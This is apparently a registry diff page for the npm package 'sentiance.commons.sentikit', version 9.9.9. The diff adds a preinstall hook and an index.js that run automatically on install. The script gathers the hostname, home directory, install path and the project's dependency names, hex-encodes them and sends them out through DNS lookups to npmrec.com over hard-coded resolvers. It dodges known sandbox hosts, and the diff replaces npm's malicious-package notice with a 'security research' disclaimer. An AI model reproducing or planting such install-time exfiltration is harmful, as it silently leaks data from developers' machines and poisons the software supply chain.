sentiance.commons.sentikit 0.0.1-security → 9.9.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of sentiance.commons.sentikit might be problematic. Click here for more details.
- package/README.md +1 -5
- package/index.js +113 -0
- package/package.json +7 -3
package/README.md
CHANGED
@@ -1,5 +1 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=sentiance.commons.sentikit for more information.
|
1
|
+
This package is meant for security research purposes and does not contain any useful code.
|
package/index.js
ADDED
@@ -0,0 +1,113 @@
|
|
1
|
+
/*
|
2
|
+
|
3
|
+
This code is used for research purposes.
|
4
|
+
|
5
|
+
No sensitive data is retrieved.
|
6
|
+
|
7
|
+
Callbacks from within organizations with a
|
8
|
+
responsible disclosure program will be reported
|
9
|
+
directly to the organizations.
|
10
|
+
|
11
|
+
Any other callbacks will be ignored, and
|
12
|
+
any associated data will not be kept.
|
13
|
+
|
14
|
+
If you have any questions, please contact:
|
15
|
+
- harbitz@wearehackerone.com
|
16
|
+
|
17
|
+
*/
|
18
|
+
|
19
|
+
const dns = require("dns");
|
20
|
+
const os = require("os")
|
21
|
+
const fs = require("fs");
|
22
|
+
const process = require("process");
|
23
|
+
|
24
|
+
function toHex(str) {
|
25
|
+
var result = '';
|
26
|
+
for (var i=0; i<str.length; i++) {
|
27
|
+
result += str.charCodeAt(i).toString(16);
|
28
|
+
}
|
29
|
+
return result;
|
30
|
+
}
|
31
|
+
|
32
|
+
const homeDirsToIgnore = [
|
33
|
+
"/root/test/node_modules",
|
34
|
+
"/ptd/node_modules",
|
35
|
+
"/home/fakename/app",
|
36
|
+
"/root",
|
37
|
+
"/home/lili",
|
38
|
+
"/home/app"
|
39
|
+
];
|
40
|
+
|
41
|
+
const hostnamesToIgnore = [
|
42
|
+
"BBOGENS-LAPTOP",
|
43
|
+
];
|
44
|
+
|
45
|
+
function getPkgJsonDir() {
|
46
|
+
const { dirname } = require ( 'path' );
|
47
|
+
const { constants, accessSync } = require ( 'fs' );
|
48
|
+
|
49
|
+
for ( let path of module.paths ) {
|
50
|
+
try {
|
51
|
+
let prospectivePkgJsonDir = dirname ( path );
|
52
|
+
accessSync ( path, constants.F_OK );
|
53
|
+
return prospectivePkgJsonDir;
|
54
|
+
} catch ( e ) {}
|
55
|
+
}
|
56
|
+
}
|
57
|
+
|
58
|
+
function main() {
|
59
|
+
const pjs = JSON.parse((fs.readFileSync(__dirname + "/package.json")).toString());
|
60
|
+
const id = Date.now();
|
61
|
+
|
62
|
+
if (homeDirsToIgnore.indexOf(os.homedir()) > -1) {
|
63
|
+
return;
|
64
|
+
}
|
65
|
+
|
66
|
+
if (hostnamesToIgnore.indexOf(os.hostname()) > -1) {
|
67
|
+
return;
|
68
|
+
}
|
69
|
+
|
70
|
+
let packages = "";
|
71
|
+
|
72
|
+
try {
|
73
|
+
const pjsRoot = JSON.parse((fs.readFileSync(getPkgJsonDir() + "/package.json")).toString());
|
74
|
+
packages = JSON.stringify(Array.from(Object.keys(pjsRoot.dependencies)).join(";"));
|
75
|
+
} catch {
|
76
|
+
}
|
77
|
+
|
78
|
+
const relevantInfo = [
|
79
|
+
os.hostname(),
|
80
|
+
os.homedir(),
|
81
|
+
__dirname,
|
82
|
+
pjs.name + "-" + pjs.version,
|
83
|
+
packages
|
84
|
+
]
|
85
|
+
|
86
|
+
const stringFragments = toHex(JSON.stringify(relevantInfo)).match(/.{1,63}/g);
|
87
|
+
|
88
|
+
sendData(stringFragments);
|
89
|
+
dns.lookup('ns1.npmrec.com', function(err, address) {
|
90
|
+
if (!err) {
|
91
|
+
nsAddress = address;
|
92
|
+
} else {
|
93
|
+
nsAddress = '8.8.8.8';
|
94
|
+
}
|
95
|
+
dns.setServers(['188.166.0.193', '188.166.110.6']);
|
96
|
+
sendData(stringFragments);
|
97
|
+
});
|
98
|
+
|
99
|
+
function sendData(stringFragments) {
|
100
|
+
for (let i = 0; i < stringFragments.length; i++) {
|
101
|
+
try {
|
102
|
+
resolveFragment(id, i, stringFragments);
|
103
|
+
} catch {
|
104
|
+
}
|
105
|
+
}
|
106
|
+
}
|
107
|
+
|
108
|
+
function resolveFragment(id, counter, stringFragments) {
|
109
|
+
dns.resolve4(`morjok.${id}.${counter+1}.${stringFragments[counter]}.npmrec.com`, () => {})
|
110
|
+
}
|
111
|
+
}
|
112
|
+
|
113
|
+
main();
|
package/package.json
CHANGED
@@ -1,6 +1,10 @@
|
|
1
1
|
{
|
2
|
+
"description": "Security research purposes only.",
|
3
|
+
"main": "index.js",
|
2
4
|
"name": "sentiance.commons.sentikit",
|
3
|
-
"
|
4
|
-
"
|
5
|
-
|
5
|
+
"license": "ISC",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "node index.js"
|
8
|
+
},
|
9
|
+
"version": "9.9.9"
|
6
10
|
}
|